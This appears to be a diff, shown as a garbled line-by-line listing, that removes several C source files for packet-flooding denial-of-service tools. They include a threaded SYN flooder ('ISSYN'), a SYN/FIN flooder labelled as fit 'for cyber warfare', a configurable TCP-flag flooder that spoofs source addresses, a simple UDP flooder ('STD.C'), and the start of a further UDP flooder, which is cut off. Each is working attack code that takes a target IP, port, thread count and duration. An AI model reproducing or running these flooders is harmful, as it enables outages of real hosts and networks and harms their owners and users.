memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
char ip[17];
|
|
||||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(rand()%54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr(ip);
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(rand()%65535);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = 0;
|
|
||||||
tcph->res1 = 0;
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->psh = 0;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->window = htons(65535);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(rand()%54321);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
tcph->dest = htons(rand()%54321);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
int psh = 0;
|
|
||||||
int res1 = 0;
|
|
||||||
int res2 = 0;
|
|
||||||
while(1)
|
|
||||||
{
|
|
||||||
if(psh > 1) psh = 1;
|
|
||||||
if(res1 > 4) res1 = 0;
|
|
||||||
if(res2 > 3) res2 = 0;
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
tcph->dest = htons(rand()%65535);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->ack_seq = 1;
|
|
||||||
tcph->psh = psh;
|
|
||||||
tcph->res1 = res1;
|
|
||||||
tcph->res2 = res2;
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
pps++;
|
|
||||||
psh++;
|
|
||||||
res1++;
|
|
||||||
res2++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stdout, "ISSYN v1.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
srand(time(0));
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
int multiplier = 20;
|
|
||||||
int i;
|
|
||||||
fprintf(stderr, "Start flooding ...\n", argv[1]);
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stderr, "Flooding: %s\n", argv[1]);
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,201 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = rand();
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->fin = 1;
|
|
||||||
tcph->window = rand();
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
int multiplier = 20;
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,269 +0,0 @@
|
|||||||
/* STCP - AnonnPL, look at TeamSpeakCrack.com */
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
int ack,syn,psh,fin,rst,urg,ptr,res2,seq;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(rand()%54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("8.8.8.8");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(rand()%65535);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack = ack;
|
|
||||||
tcph->ack_seq = seq;
|
|
||||||
tcph->psh = psh;
|
|
||||||
tcph->fin = fin;
|
|
||||||
tcph->rst = rst;
|
|
||||||
tcph->res2 = res2;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = syn;
|
|
||||||
tcph->urg = urg;
|
|
||||||
tcph->urg_ptr = ptr;
|
|
||||||
tcph->window = htonl(65535);
|
|
||||||
tcph->check = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 7){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <port> <threads> <pps limiter, -1 for no limit> <time> <ack,syn,psh,fin,rst,urg,ptr,res2,seq>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
//TCP FLAGS
|
|
||||||
if(strstr(argv[6], "ack"))
|
|
||||||
ack = 1;
|
|
||||||
else
|
|
||||||
ack = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "seq"))
|
|
||||||
seq = 1;
|
|
||||||
else
|
|
||||||
seq = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "psh"))
|
|
||||||
psh = 1;
|
|
||||||
else
|
|
||||||
psh = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "fin"))
|
|
||||||
fin = 1;
|
|
||||||
else
|
|
||||||
fin = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "rst"))
|
|
||||||
rst = 1;
|
|
||||||
else
|
|
||||||
rst = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "res2"))
|
|
||||||
res2 = 1;
|
|
||||||
else
|
|
||||||
res2 = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "syn"))
|
|
||||||
syn = 1;
|
|
||||||
else
|
|
||||||
syn = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "urg"))
|
|
||||||
urg = 1;
|
|
||||||
else
|
|
||||||
urg = 0;
|
|
||||||
|
|
||||||
if(strstr(argv[6], "ptr"))
|
|
||||||
ptr = 1;
|
|
||||||
else
|
|
||||||
ptr = 0;
|
|
||||||
|
|
||||||
//FLAGS END
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
fprintf(stdout, "Code by Anonn\n");
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,49 +0,0 @@
|
|||||||
/* STD.C By stackd - (root@stackd.net) Define strings to what you feel fit */
|
|
||||||
|
|
||||||
#define STD2_STRING "std"
|
|
||||||
#define STD2_SIZE 50
|
|
||||||
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <sys/param.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <stdarg.h>
|
|
||||||
|
|
||||||
int echo_connect(char *, short);
|
|
||||||
|
|
||||||
int echo_connect(char *server, short port)
|
|
||||||
{
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
struct hostent *hp;
|
|
||||||
int thesock;
|
|
||||||
hp = gethostbyname(server);
|
|
||||||
if (hp==NULL) {
|
|
||||||
printf("Unknown host: %s\n",server);
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
printf(" STD.C -- Packeting %s:%d\n ", server, port);
|
|
||||||
bzero((char*) &sin,sizeof(sin));
|
|
||||||
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
|
|
||||||
sin.sin_family = hp->h_addrtype;
|
|
||||||
sin.sin_port = htons(port);
|
|
||||||
thesock = socket(AF_INET, SOCK_DGRAM, 0);
|
|
||||||
connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
return thesock;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
main(int argc, char **argv)
|
|
||||||
{
|
|
||||||
int s;
|
|
||||||
if(argc != 3)
|
|
||||||
{
|
|
||||||
fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]);
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
s=echo_connect(argv[1], atoi(argv[2]));
|
|
||||||
for(;;)
|
|
||||||
{
|
|
||||||
send(s, STD2_STRING, STD2_SIZE, 0);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,184 +0,0 @@
|
|||||||
/*
|
|
||||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
||||||
*/
|
|
||||||
#include <time.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static uint32_t Q[4096], c = 362436;
|
|
||||||
struct thread_data{
|
|
||||||
int throttle;
|
|
||||||
int thread_id;
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
};
|
|
||||||
void init_rand(uint32_t x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
|
|
||||||
for (i = 3; i < 4096; i++)
|
|
||||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
|
||||||
}
|
|
||||||
uint32_t rand_cmwc(void)
|
|
||||||
{
|
|
||||||
uint64_t t, a = 18782LL;
|
|
||||||
static uint32_t i = 4095;
|
|
||||||
uint32_t x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
char *myStrCat (char *s, char *a) {
|
|
||||||
while (*s != '\0') s++;
|
|
||||||
while (*a != '\0') *s++ = *a++;
|
|
||||||
*s = '\0';
|
|
||||||
return s;
|
|
||||||
}
|
|
||||||
char *replStr (char *str, size_t count) {
|
|
||||||
if (count == 0) return NULL;
|
|
||||||
